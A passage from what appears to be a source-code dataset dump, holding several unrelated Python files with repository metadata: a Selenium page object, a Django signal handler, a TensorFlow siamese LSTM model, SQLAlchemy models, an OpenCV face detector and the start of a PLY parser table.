    SubmitButton_loc=(By.XPATH, "//button[@class='confirm']")  # confirm sign-off
    CancelButton_loc=(By.XPATH, "//button[@class='cancel']")  # cancel sign-off
    valitext_loc=(By.XPATH,"//div[@class='modal-body text-center']/h1")  # result message
    SubmitButton02_loc=(By.XPATH, "//button[@ng-click='hasNext()']")  # follow-up confirm
    CancelButton2_loc=(By.XPATH, "//button[@ng-click='cancelModal']")  # follow-up cancel

    def getSubmitButtonField(self):
        """Click the confirm button of the sign-off dialog."""
        self.findElement(*self.SubmitButton_loc).click()
        # NOTE(review): bare attribute access -- if WebUI.wait is a method
        # it is never invoked here (same in the methods below); confirm.
        self.wait

    def getCancelButtonField(self):
        """Click the cancel button of the sign-off dialog."""
        self.findElement(*self.CancelButton_loc).click()
        self.wait

    def getSubmitButton02Field(self):
        """Click the 'has next' confirm button of the follow-up dialog."""
        self.findElement(*self.SubmitButton02_loc).click()
        self.wait

    def getCancelButton2Field(self):
        """Click the cancel button of the follow-up dialog."""
        self.findElement(*self.CancelButton2_loc).click()
        self.wait

    def getValitextField(self):
        """Return the validation message shown in the dialog body.

        Fix: the original read .text but never returned it, so callers
        always received None.
        """
        text = self.findElement(*self.valitext_loc).text
        self.wait
        return text

    def DealCourse01(self):
        """Sign off a lesson without printing a ticket; return the
        confirmation message.

        Fixes: the original referenced getSubmitButtonField without calling
        it, and this method was silently shadowed by a second, empty
        DealCourse01 definition (now renamed DealCourse02).
        """
        self.getSubmitButtonField()
        # NOTE(review): getConfirmValiTextField is not defined in this
        # class; it is presumably inherited from WebUI -- confirm.
        valiText = self.getConfirmValiTextField()
        self.getCancelButton2Field()
        return valiText

    def DealCourse02(self):
        """Sign off a lesson and print the ticket (not implemented yet)."""
        pass
# This module is meant to be imported as a page object; no standalone behaviour.
if __name__=='__main__':
    pass
| [
"qwerty1990"
] | qwerty1990 |
777b2f147135a023870de3cce3193786a5c9b525 | 55f60b7ec448eb48b75118b01b3878c8345242bb | /tests/scripts/waf-tools/f_guidelines/__init__.py | de2b6d8f5507598e6072beabb216d9c336060fc1 | [
"BSD-3-Clause",
"CC-BY-4.0"
] | permissive | dd-rrc-ps/foxbms-2 | cd8d272afa24187c85c6fa747226bebed4cefc5e | 555704a9c4af3dd1c2213e6f0be9860f34e2b1b3 | refs/heads/master | 2023-08-18T13:49:42.503755 | 2021-10-21T12:15:09 | 2021-10-21T12:15:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,136 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright (c) 2010 - 2021, Fraunhofer-Gesellschaft zur Foerderung der angewandten Forschung e.V.
# All rights reserved.
#
# SPDX-License-Identifier: BSD-3-Clause
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# We kindly request you to use one or more of the following phrases to refer to
# foxBMS in your hardware, software, documentation or advertising materials:
#
# - "This product uses parts of foxBMS®"
# - "This product includes parts of foxBMS®"
# - "This product is derived from foxBMS®"
# f_guidelines is not a proper python module name, but this is OK since we need
# it just for the unit test discovery
# pylint: disable-all
| [
"info@foxbms.org"
] | info@foxbms.org |
ced52954601fbdcf1fa084b29d93f2b704f2dc9e | afc7c607537dd2cb9a88d3fa44c660dbd375cb72 | /hdb/management/__init__.py | 4a76395d4c1a3a677a8437bccdd367620488e925 | [] | no_license | twoolie/hostdb | fff98a0719e4bf18f82a211ed325f0620761d3f0 | 3cfa729155b355790e5bddf08ee0aeb7592eb3b1 | refs/heads/master | 2021-01-23T15:43:05.362550 | 2011-03-19T03:47:53 | 2011-03-19T03:47:53 | 1,494,864 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 375 | py | import models
#from django.db.models import signals, get_apps, get_models
from django.dispatch import receiver
@receiver(post_syncdb, sender=models)
def init_data(app, created_models, verbosity, **kwargs):
if models.DNSZone in created_models:
zone = models.DNSZone(
zonename="Global",
ttl = 43200 # 12Hr TTL
)
zone.save()
| [
"rocker.of.beds@gmail.com"
] | rocker.of.beds@gmail.com |
0fcd767243f2e22f1a5096700c27daf46505043f | b921bcf70d7595e6adadd710604b021172256ec6 | /siamese_network_semantic.py | 4f1951ae67741773085a8537ae14081a041af9e7 | [
"MIT"
] | permissive | fossabot/deep-siamese-text-similarity | 390e1aad1a84ef326e450cd5dffeec387a8b86af | 7de9d2c458caa553219cfdd3201d8105fdfd64c9 | refs/heads/master | 2020-03-20T23:23:26.526906 | 2018-06-19T05:29:26 | 2018-06-19T05:29:26 | 137,844,122 | 0 | 0 | null | 2018-06-19T05:29:25 | 2018-06-19T05:29:25 | null | UTF-8 | Python | false | false | 3,804 | py | import tensorflow as tf
import numpy as np
class SiameseLSTMw2v(object):
    """
    A LSTM based deep Siamese network for text similarity.

    Looks word ids up in a pre-trained (optionally frozen) embedding table,
    encodes each of the two input sentences with a 3-layer stacked LSTM, and
    scores the pair with a normalized Euclidean distance trained via a
    contrastive loss.

    Written against TensorFlow 1.x (tf.contrib, static_rnn) and Python 2
    (note the bare `print` statement in __init__). Despite the "siamese"
    name, the two towers are built under different variable scopes
    ("side1"/"side2" below), so their weights are NOT tied here.
    """
    def stackedRNN(self, x, dropout, scope, embedding_size, sequence_length, hidden_units):
        """Run a 3-layer LSTM over `x` and return the last time step's output.

        `x` is assumed to be (batch, time, embedding) — TODO confirm — and is
        unstacked into the per-timestep list that tf.nn.static_rnn requires.
        `scope` namespaces the variables (one scope per siamese side).
        `embedding_size` and `sequence_length` are accepted but unused.
        """
        n_hidden=hidden_units
        n_layers=3
        # Prepare data shape to match `static_rnn` function requirements:
        # a Python list of `time` tensors, each (batch, embedding).
        x = tf.unstack(tf.transpose(x, perm=[1, 0, 2]))
        # Forward-direction stacked LSTM with per-layer output dropout.
        with tf.name_scope("fw"+scope),tf.variable_scope("fw"+scope):
            stacked_rnn_fw = []
            for _ in range(n_layers):
                fw_cell = tf.nn.rnn_cell.BasicLSTMCell(n_hidden, forget_bias=1.0, state_is_tuple=True)
                lstm_fw_cell = tf.contrib.rnn.DropoutWrapper(fw_cell,output_keep_prob=dropout)
                stacked_rnn_fw.append(lstm_fw_cell)
            lstm_fw_cell_m = tf.nn.rnn_cell.MultiRNNCell(cells=stacked_rnn_fw, state_is_tuple=True)
            outputs, _ = tf.nn.static_rnn(lstm_fw_cell_m, x, dtype=tf.float32)
        # The last time step's hidden output is the sentence representation.
        return outputs[-1]
    def contrastive_loss(self, y,d,batch_size):
        """Contrastive loss: y=1 pulls distance d toward 0; y=0 pushes d past 1."""
        tmp= y *tf.square(d)
        #tmp= tf.mul(y,tf.square(d))
        # Margin term: only penalizes dissimilar pairs with distance below 1.
        tmp2 = (1-y) *tf.square(tf.maximum((1 - d),0))
        return tf.reduce_sum(tmp +tmp2)/batch_size/2
    def __init__(
        self, sequence_length, vocab_size, embedding_size, hidden_units, l2_reg_lambda, batch_size, trainableEmbeddings):
        # Placeholders for input (two sentences as id sequences), labels and dropout.
        self.input_x1 = tf.placeholder(tf.int32, [None, sequence_length], name="input_x1")
        self.input_x2 = tf.placeholder(tf.int32, [None, sequence_length], name="input_x2")
        self.input_y = tf.placeholder(tf.float32, [None], name="input_y")
        self.dropout_keep_prob = tf.placeholder(tf.float32, name="dropout_keep_prob")
        # Keeping track of l2 regularization loss (optional).
        # NOTE(review): l2_reg_lambda is accepted but never applied below.
        l2_loss = tf.constant(0.0, name="l2_loss")
        # Embedding layer: zero-initialized table, expected to be overwritten
        # with pre-trained w2v vectors; trainableEmbeddings controls fine-tuning.
        with tf.name_scope("embedding"):
            self.W = tf.Variable(
                tf.constant(0.0, shape=[vocab_size, embedding_size]),
                trainable=trainableEmbeddings,name="W")
            self.embedded_words1 = tf.nn.embedding_lookup(self.W, self.input_x1)
            self.embedded_words2 = tf.nn.embedding_lookup(self.W, self.input_x2)
            print self.embedded_words1
        # Encode both sides; separate scopes mean separate (untied) weights.
        with tf.name_scope("output"):
            self.out1=self.stackedRNN(self.embedded_words1, self.dropout_keep_prob, "side1", embedding_size, sequence_length, hidden_units)
            self.out2=self.stackedRNN(self.embedded_words2, self.dropout_keep_prob, "side2", embedding_size, sequence_length, hidden_units)
            # Normalized Euclidean distance: ||o1-o2|| / (||o1|| + ||o2||).
            self.distance = tf.sqrt(tf.reduce_sum(tf.square(tf.subtract(self.out1,self.out2)),1,keep_dims=True))
            self.distance = tf.div(self.distance, tf.add(tf.sqrt(tf.reduce_sum(tf.square(self.out1),1,keep_dims=True)),tf.sqrt(tf.reduce_sum(tf.square(self.out2),1,keep_dims=True))))
            self.distance = tf.reshape(self.distance, [-1], name="distance")
        with tf.name_scope("loss"):
            self.loss = self.contrastive_loss(self.input_y,self.distance, batch_size)
        #### Accuracy computation is outside of this class.
        with tf.name_scope("accuracy"):
            self.temp_sim = tf.subtract(tf.ones_like(self.distance),tf.rint(self.distance)) #auto threshold 0.5
            correct_predictions = tf.equal(self.temp_sim, self.input_y)
            self.accuracy=tf.reduce_mean(tf.cast(correct_predictions, "float"), name="accuracy")
| [
"dhwaj.raj@insideview.com"
] | dhwaj.raj@insideview.com |
da340106c28b5d5851925721f44c780d482c7c28 | b478153a40d9d3f1f1026d5492812a43c5a77b85 | /database-backend/account_manage/account_models.py | 2063eae5262e5de11e456fb4d1f298e31b438ae9 | [
"MIT"
] | permissive | teamwong111/Database-Course | d373b709ff5bee513d44a76796e55c4db6ae89b7 | 6e28770173ca9485aaf0958d6581e5ef4a16a7ae | refs/heads/main | 2023-06-03T20:17:11.105109 | 2021-06-17T14:30:03 | 2021-06-17T14:30:03 | 343,795,652 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,365 | py | import sys
from sqlalchemy.sql.expression import true
from db_manage.sql import db
sys.path.append("..")
class User(db.Model):
    """Application user account, mapped to the `User` table.

    `portrait` defaults to a hosted placeholder avatar URL.
    """
    __tablename__ = 'User'
    user_id = db.Column(db.Integer, primary_key=True, unique=True, nullable=False, index=True)
    name = db.Column(db.String(80), nullable=False)
    account = db.Column(db.String(120), unique=True, nullable=False)  # login name
    # NOTE(review): appears to store the password as-is; confirm hashing
    # happens upstream before rows are written.
    password = db.Column(db.String(120), nullable=False)
    portrait = db.Column(db.String(80), nullable=False, default="http://212.64.38.61/tools/head.jpg")

    def to_json(self):
        """Return this row's column values as a plain, JSON-friendly dict.

        Fix: the original returned `self.__dict__` itself after deleting
        SQLAlchemy's `_sa_instance_state` key from it, which mutates the live
        instance and corrupts the ORM's session bookkeeping (it also shadowed
        the builtin `dict`). Work on a copy instead.
        """
        data = dict(self.__dict__)
        data.pop("_sa_instance_state", None)
        return data

    def __repr__(self):
        return '<User %r>' % self.name
class Bodydata(db.Model):
    """One body-measurement record (height/weight/BMI/heart rate) per row,
    linked to a user via `user_id`."""
    __tablename__ = 'Bodydata'
    bodydata_id = db.Column(db.Integer, primary_key=True, unique=True, nullable=False)
    height = db.Column(db.Float, nullable=False)
    weight = db.Column(db.Float, nullable=False)  # weight (original note: the spec document got this field wrong)
    bmi = db.Column(db.Float, nullable=False)
    heart_rate = db.Column(db.Float, nullable=False)
    user_id = db.Column(db.Integer, db.ForeignKey('User.user_id'), nullable=False)

    def to_json(self):
        """Return this row's column values as a plain, JSON-friendly dict.

        Fix: copy `self.__dict__` before dropping SQLAlchemy's
        `_sa_instance_state` key; the original deleted it from the live
        instance dict, corrupting the ORM's bookkeeping (and shadowed the
        builtin `dict`).
        """
        data = dict(self.__dict__)
        data.pop("_sa_instance_state", None)
        return data
| [
"841713301@qq.com"
] | 841713301@qq.com |
44e6ffb7623b1324b2583fdd3de7b0bcab80cb38 | 4646f21ea5a834952eaaf90492873a236c90e244 | /FaceDetection.py | 6a8fa920ad884373a844ca94e0213125d4194e32 | [] | no_license | ThunderZeus99/Face-Recognition | 045aee1bd843a8959bfa6dfe2b02f503bddf06e3 | 46a472fac752686318dbfbc0b30e98dc7436a865 | refs/heads/main | 2023-08-20T16:35:34.373527 | 2021-10-10T11:52:06 | 2021-10-10T11:52:06 | 415,568,752 | 0 | 0 | null | 2021-10-10T11:40:40 | 2021-10-10T11:40:39 | null | UTF-8 | Python | false | false | 1,031 | py | import cv2
trained_face_data = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
webcam = cv2.VideoCapture(0)
while True:
successful_frame_read , frame = webcam.read()
#to apply the alreaday trained haarcascade model we will convert the real time video frames to grayscale
grayscaled_frame = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
#to identify face , we will use face coordinates
face_coordinates = trained_face_data.detectMultiScale(grayscaled_frame)
#face_coordinates contains 4 tuples x,y for the starting rectange and w and h for the dimension of rectange
for (x,y,w,h) in face_coordinates:
cv2.rectangle(frame, (x,y), (x+w,y+h), (0,0,255),5)
#last 2 statements is for color and thickness to place in the screen
cv2.imshow("Sohail's face detection using haar cascade", frame)
key = cv2.waitKey(1)
#argument in waitKey will tell to refresh at x ms
if (key == 81 or key == 113):
break
webcam.release()
cv2.destroyAllWindows() | [
"noreply@github.com"
] | ThunderZeus99.noreply@github.com |
0f90d491156e9da7d0fbbaa8e57e2a5475cdfeba | da0bfca935f6f73ceb26d6cfbde85b2bc7cf65d3 | /my_options/key_generation_options.py | 151925728682937f229f173e3d479ee52a85ba4f | [
"MIT"
] | permissive | ASU-APG/decentralized_attribution_of_generative_models | c0070a2e33b178bf7745c681c9f62bac67cc2e57 | b57c38b215cff4df24744262ffa02d41c61151ac | refs/heads/master | 2023-03-22T09:16:01.828670 | 2021-03-22T03:46:53 | 2021-03-22T03:46:53 | 328,608,508 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 548 | py | from my_options.my_base_option import BaseOptions
class Key_Generation_Options(BaseOptions):
    """Command-line options for the key-generation stage.

    Extends BaseOptions with flags controlling how many keys to train and
    whether this run continues a previous key-training session.
    """

    def initialize(self, parser):
        """Register key-generation arguments on *parser* and return it."""
        BaseOptions.initialize(self, parser)
        #parser.add_argument('--previous_experiment', required=True, help='Location of key 1')
        # NOTE(review): `required=True` makes `default=1` dead — the default
        # can never apply; kept for interface compatibility.
        # Help strings fixed: "How many key" -> "How many keys",
        # "trainig" -> "training".
        parser.add_argument('--how_many_key', required=True, type=int, default=1,
                            help='How many keys do you want to train')
        parser.add_argument('--additional_key_training', action="store_true", default=False,
                            help='If this is additional key training')
        return parser
"ckim79@asu.edu"
] | ckim79@asu.edu |
ce9fd1850a2bc4f39639a4196866dcd26755a4ce | cc20abf4865e57bd4b4c99357c98f78a72dcc687 | /2-dimensional/1/1-7.py | 0d198719dfbeb69fd6bcc5c70e20baba1af9503a | [] | no_license | MinkiChung/code_up_100 | 10549478f4eef46fb282b0d5476267fd4b4a03ef | a621265ef62bbe2df312f6fb8f55857825b54eee | refs/heads/master | 2023-09-01T18:26:53.693409 | 2021-10-31T15:58:57 | 2021-10-31T15:58:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 258 | py | n, m = map(int, input().split())
d = []
for i in range(n):
d.append([])
for i in range(n):
for j in range((i+1)+(m-1)*n, i, -n):
d[i].append(j)
for i in range(n-1, -1, -1):
for j in range(m):
print(d[i][j], end=' ')
print() | [
"jmk05099@ggmail.com"
] | jmk05099@ggmail.com |
42ddf77f650e31988b576c83bb98de208ccc1a47 | 151c91748160dac3fbacce495bec1c82364b5e29 | /src/parsetab.py | 5bd5bb85e1822f6185e5ea3df69ce45b2ff2ad16 | [] | no_license | haoozi/CFormatter | 0321e49ea4fb9a61d03e606ae0de1e7f6d09f1fc | 6d2bac538094e465bf6d1e2de9b2a86d4db23fd5 | refs/heads/master | 2020-05-31T12:28:06.790648 | 2019-06-06T18:49:53 | 2019-06-06T18:49:53 | 190,281,528 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 169,507 | py |
# parsetab.py
# This file is automatically generated. Do not edit.
# pylint: disable=W,C,R
_tabversion = '3.10'
_lr_method = 'LALR'
_lr_signature = 'translation_unit_or_emptyleftLORleftLANDleftORleftXORleftANDleftEQNEleftGTGELTLEleftRSHIFTLSHIFTleftPLUSMINUSleftTIMESDIVIDEMODAND ANDEQUAL ARROW AUTO BREAK CASE CHAR CHAR_CONST COLON COMMA CONDOP CONST CONTINUE DEFAULT DIVEQUAL DIVIDE DO DOUBLE ELLIPSIS ELSE ENUM EQ EQUALS EXTERN FLOAT FLOAT_CONST FOR GE GOTO GT HEX_FLOAT_CONST ID IF INLINE INT INT_CONST_BIN INT_CONST_DEC INT_CONST_HEX INT_CONST_OCT LAND LBRACE LBRACKET LE LNOT LONG LOR LPAREN LSHIFT LSHIFTEQUAL LT MINUS MINUSEQUAL MINUSMINUS MOD MODEQUAL NE NOT OFFSETOF OR OREQUAL PERIOD PLUS PLUSEQUAL PLUSPLUS PPHASH PPPRAGMA PPPRAGMASTR RBRACE RBRACKET REGISTER RESTRICT RETURN RPAREN RSHIFT RSHIFTEQUAL SEMI SHORT SIGNED SIZEOF STATIC STRING_LITERAL STRUCT SWITCH TIMES TIMESEQUAL TYPEDEF TYPEID UNION UNSIGNED VOID VOLATILE WCHAR_CONST WHILE WSTRING_LITERAL XOR XOREQUAL _BOOL _COMPLEX __INT128abstract_declarator_opt : empty\n| abstract_declaratorassignment_expression_opt : empty\n| assignment_expressionblock_item_list_opt : empty\n| block_item_listdeclaration_list_opt : empty\n| declaration_listdeclaration_specifiers_no_type_opt : empty\n| declaration_specifiers_no_typedesignation_opt : empty\n| designationexpression_opt : empty\n| expressionid_init_declarator_list_opt : empty\n| id_init_declarator_listidentifier_list_opt : empty\n| identifier_listinit_declarator_list_opt : empty\n| init_declarator_listinitializer_list_opt : empty\n| initializer_listparameter_type_list_opt : empty\n| parameter_type_liststruct_declarator_list_opt : empty\n| struct_declarator_listtype_qualifier_list_opt : empty\n| type_qualifier_list direct_id_declarator : ID\n direct_id_declarator : LPAREN id_declarator RPAREN\n direct_id_declarator : direct_id_declarator LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET\n direct_id_declarator : direct_id_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET\n | direct_id_declarator LBRACKET type_qualifier_list STATIC 
assignment_expression RBRACKET\n direct_id_declarator : direct_id_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET\n direct_id_declarator : direct_id_declarator LPAREN parameter_type_list RPAREN\n | direct_id_declarator LPAREN identifier_list_opt RPAREN\n direct_typeid_declarator : TYPEID\n direct_typeid_declarator : LPAREN typeid_declarator RPAREN\n direct_typeid_declarator : direct_typeid_declarator LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET\n direct_typeid_declarator : direct_typeid_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET\n | direct_typeid_declarator LBRACKET type_qualifier_list STATIC assignment_expression RBRACKET\n direct_typeid_declarator : direct_typeid_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET\n direct_typeid_declarator : direct_typeid_declarator LPAREN parameter_type_list RPAREN\n | direct_typeid_declarator LPAREN identifier_list_opt RPAREN\n direct_typeid_noparen_declarator : TYPEID\n direct_typeid_noparen_declarator : direct_typeid_noparen_declarator LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET\n direct_typeid_noparen_declarator : direct_typeid_noparen_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET\n | direct_typeid_noparen_declarator LBRACKET type_qualifier_list STATIC assignment_expression RBRACKET\n direct_typeid_noparen_declarator : direct_typeid_noparen_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET\n direct_typeid_noparen_declarator : direct_typeid_noparen_declarator LPAREN parameter_type_list RPAREN\n | direct_typeid_noparen_declarator LPAREN identifier_list_opt RPAREN\n id_declarator : direct_id_declarator\n id_declarator : pointer direct_id_declarator\n typeid_declarator : direct_typeid_declarator\n typeid_declarator : pointer direct_typeid_declarator\n typeid_noparen_declarator : direct_typeid_noparen_declarator\n typeid_noparen_declarator : pointer 
direct_typeid_noparen_declarator\n translation_unit_or_empty : translation_unit\n | empty\n translation_unit : external_declaration\n translation_unit : translation_unit external_declaration\n external_declaration : function_definition\n external_declaration : declaration\n external_declaration : pp_directive\n | pppragma_directive\n external_declaration : SEMI\n pp_directive : PPHASH\n pppragma_directive : PPPRAGMA\n | PPPRAGMA PPPRAGMASTR\n function_definition : id_declarator declaration_list_opt compound_statement\n function_definition : declaration_specifiers id_declarator declaration_list_opt compound_statement\n statement : labeled_statement\n | expression_statement\n | compound_statement\n | selection_statement\n | iteration_statement\n | jump_statement\n | pppragma_directive\n pragmacomp_or_statement : pppragma_directive statement\n | statement\n decl_body : declaration_specifiers init_declarator_list_opt\n | declaration_specifiers_no_type id_init_declarator_list_opt\n declaration : decl_body SEMI\n declaration_list : declaration\n | declaration_list declaration\n declaration_specifiers_no_type : type_qualifier declaration_specifiers_no_type_opt\n declaration_specifiers_no_type : storage_class_specifier declaration_specifiers_no_type_opt\n declaration_specifiers_no_type : function_specifier declaration_specifiers_no_type_opt\n declaration_specifiers : declaration_specifiers type_qualifier\n declaration_specifiers : declaration_specifiers storage_class_specifier\n declaration_specifiers : declaration_specifiers function_specifier\n declaration_specifiers : declaration_specifiers type_specifier_no_typeid\n declaration_specifiers : type_specifier\n declaration_specifiers : declaration_specifiers_no_type type_specifier\n storage_class_specifier : AUTO\n | REGISTER\n | STATIC\n | EXTERN\n | TYPEDEF\n function_specifier : INLINE\n type_specifier_no_typeid : VOID\n | _BOOL\n | CHAR\n | SHORT\n | INT\n | LONG\n | FLOAT\n | DOUBLE\n | _COMPLEX\n | SIGNED\n | 
UNSIGNED\n | __INT128\n type_specifier : typedef_name\n | enum_specifier\n | struct_or_union_specifier\n | type_specifier_no_typeid\n type_qualifier : CONST\n | RESTRICT\n | VOLATILE\n init_declarator_list : init_declarator\n | init_declarator_list COMMA init_declarator\n init_declarator : declarator\n | declarator EQUALS initializer\n id_init_declarator_list : id_init_declarator\n | id_init_declarator_list COMMA init_declarator\n id_init_declarator : id_declarator\n | id_declarator EQUALS initializer\n specifier_qualifier_list : specifier_qualifier_list type_specifier_no_typeid\n specifier_qualifier_list : specifier_qualifier_list type_qualifier\n specifier_qualifier_list : type_specifier\n specifier_qualifier_list : type_qualifier_list type_specifier\n struct_or_union_specifier : struct_or_union ID\n | struct_or_union TYPEID\n struct_or_union_specifier : struct_or_union brace_open struct_declaration_list brace_close\n | struct_or_union brace_open brace_close\n struct_or_union_specifier : struct_or_union ID brace_open struct_declaration_list brace_close\n | struct_or_union ID brace_open brace_close\n | struct_or_union TYPEID brace_open struct_declaration_list brace_close\n | struct_or_union TYPEID brace_open brace_close\n struct_or_union : STRUCT\n | UNION\n struct_declaration_list : struct_declaration\n | struct_declaration_list struct_declaration\n struct_declaration : specifier_qualifier_list struct_declarator_list_opt SEMI\n struct_declaration : SEMI\n struct_declaration : pppragma_directive\n struct_declarator_list : struct_declarator\n | struct_declarator_list COMMA struct_declarator\n struct_declarator : declarator\n struct_declarator : declarator COLON constant_expression\n | COLON constant_expression\n enum_specifier : ENUM ID\n | ENUM TYPEID\n enum_specifier : ENUM brace_open enumerator_list brace_close\n enum_specifier : ENUM ID brace_open enumerator_list brace_close\n | ENUM TYPEID brace_open enumerator_list brace_close\n enumerator_list : enumerator\n 
| enumerator_list COMMA\n | enumerator_list COMMA enumerator\n enumerator : ID\n | ID EQUALS constant_expression\n declarator : id_declarator\n | typeid_declarator\n pointer : TIMES type_qualifier_list_opt\n | TIMES type_qualifier_list_opt pointer\n type_qualifier_list : type_qualifier\n | type_qualifier_list type_qualifier\n parameter_type_list : parameter_list\n | parameter_list COMMA ELLIPSIS\n parameter_list : parameter_declaration\n | parameter_list COMMA parameter_declaration\n parameter_declaration : declaration_specifiers id_declarator\n | declaration_specifiers typeid_noparen_declarator\n parameter_declaration : declaration_specifiers abstract_declarator_opt\n identifier_list : identifier\n | identifier_list COMMA identifier\n initializer : assignment_expression\n initializer : brace_open initializer_list_opt brace_close\n | brace_open initializer_list COMMA brace_close\n initializer_list : designation_opt initializer\n | initializer_list COMMA designation_opt initializer\n designation : designator_list EQUALS\n designator_list : designator\n | designator_list designator\n designator : LBRACKET constant_expression RBRACKET\n | PERIOD identifier\n type_name : specifier_qualifier_list abstract_declarator_opt\n abstract_declarator : pointer\n abstract_declarator : pointer direct_abstract_declarator\n abstract_declarator : direct_abstract_declarator\n direct_abstract_declarator : LPAREN abstract_declarator RPAREN direct_abstract_declarator : direct_abstract_declarator LBRACKET assignment_expression_opt RBRACKET\n direct_abstract_declarator : LBRACKET assignment_expression_opt RBRACKET\n direct_abstract_declarator : direct_abstract_declarator LBRACKET TIMES RBRACKET\n direct_abstract_declarator : LBRACKET TIMES RBRACKET\n direct_abstract_declarator : direct_abstract_declarator LPAREN parameter_type_list_opt RPAREN\n direct_abstract_declarator : LPAREN parameter_type_list_opt RPAREN\n block_item : declaration\n | statement\n block_item_list : block_item\n | 
block_item_list block_item\n compound_statement : brace_open block_item_list_opt brace_close labeled_statement : ID COLON pragmacomp_or_statement labeled_statement : CASE constant_expression COLON pragmacomp_or_statement labeled_statement : DEFAULT COLON pragmacomp_or_statement selection_statement : IF LPAREN expression RPAREN pragmacomp_or_statement selection_statement : IF LPAREN expression RPAREN statement ELSE pragmacomp_or_statement selection_statement : SWITCH LPAREN expression RPAREN pragmacomp_or_statement iteration_statement : WHILE LPAREN expression RPAREN pragmacomp_or_statement iteration_statement : DO pragmacomp_or_statement WHILE LPAREN expression RPAREN SEMI iteration_statement : FOR LPAREN expression_opt SEMI expression_opt SEMI expression_opt RPAREN pragmacomp_or_statement iteration_statement : FOR LPAREN declaration expression_opt SEMI expression_opt RPAREN pragmacomp_or_statement jump_statement : GOTO ID SEMI jump_statement : BREAK SEMI jump_statement : CONTINUE SEMI jump_statement : RETURN expression SEMI\n | RETURN SEMI\n expression_statement : expression_opt SEMI expression : assignment_expression\n | expression COMMA assignment_expression\n typedef_name : TYPEID assignment_expression : conditional_expression\n | unary_expression assignment_operator assignment_expression\n assignment_operator : EQUALS\n | XOREQUAL\n | TIMESEQUAL\n | DIVEQUAL\n | MODEQUAL\n | PLUSEQUAL\n | MINUSEQUAL\n | LSHIFTEQUAL\n | RSHIFTEQUAL\n | ANDEQUAL\n | OREQUAL\n constant_expression : conditional_expression conditional_expression : binary_expression\n | binary_expression CONDOP expression COLON conditional_expression\n binary_expression : cast_expression\n | binary_expression TIMES binary_expression\n | binary_expression DIVIDE binary_expression\n | binary_expression MOD binary_expression\n | binary_expression PLUS binary_expression\n | binary_expression MINUS binary_expression\n | binary_expression RSHIFT binary_expression\n | binary_expression LSHIFT 
binary_expression\n | binary_expression LT binary_expression\n | binary_expression LE binary_expression\n | binary_expression GE binary_expression\n | binary_expression GT binary_expression\n | binary_expression EQ binary_expression\n | binary_expression NE binary_expression\n | binary_expression AND binary_expression\n | binary_expression OR binary_expression\n | binary_expression XOR binary_expression\n | binary_expression LAND binary_expression\n | binary_expression LOR binary_expression\n cast_expression : unary_expression cast_expression : LPAREN type_name RPAREN cast_expression unary_expression : postfix_expression unary_expression : PLUSPLUS unary_expression\n | MINUSMINUS unary_expression\n | unary_operator cast_expression\n unary_expression : SIZEOF unary_expression\n | SIZEOF LPAREN type_name RPAREN\n unary_operator : AND\n | TIMES\n | PLUS\n | MINUS\n | NOT\n | LNOT\n postfix_expression : primary_expression postfix_expression : postfix_expression LBRACKET expression RBRACKET postfix_expression : postfix_expression LPAREN argument_expression_list RPAREN\n | postfix_expression LPAREN RPAREN\n postfix_expression : postfix_expression PERIOD ID\n | postfix_expression PERIOD TYPEID\n | postfix_expression ARROW ID\n | postfix_expression ARROW TYPEID\n postfix_expression : postfix_expression PLUSPLUS\n | postfix_expression MINUSMINUS\n postfix_expression : LPAREN type_name RPAREN brace_open initializer_list brace_close\n | LPAREN type_name RPAREN brace_open initializer_list COMMA brace_close\n primary_expression : identifier primary_expression : constant primary_expression : unified_string_literal\n | unified_wstring_literal\n primary_expression : LPAREN expression RPAREN primary_expression : OFFSETOF LPAREN type_name COMMA offsetof_member_designator RPAREN\n offsetof_member_designator : identifier\n | offsetof_member_designator PERIOD identifier\n | offsetof_member_designator LBRACKET expression RBRACKET\n argument_expression_list : assignment_expression\n | 
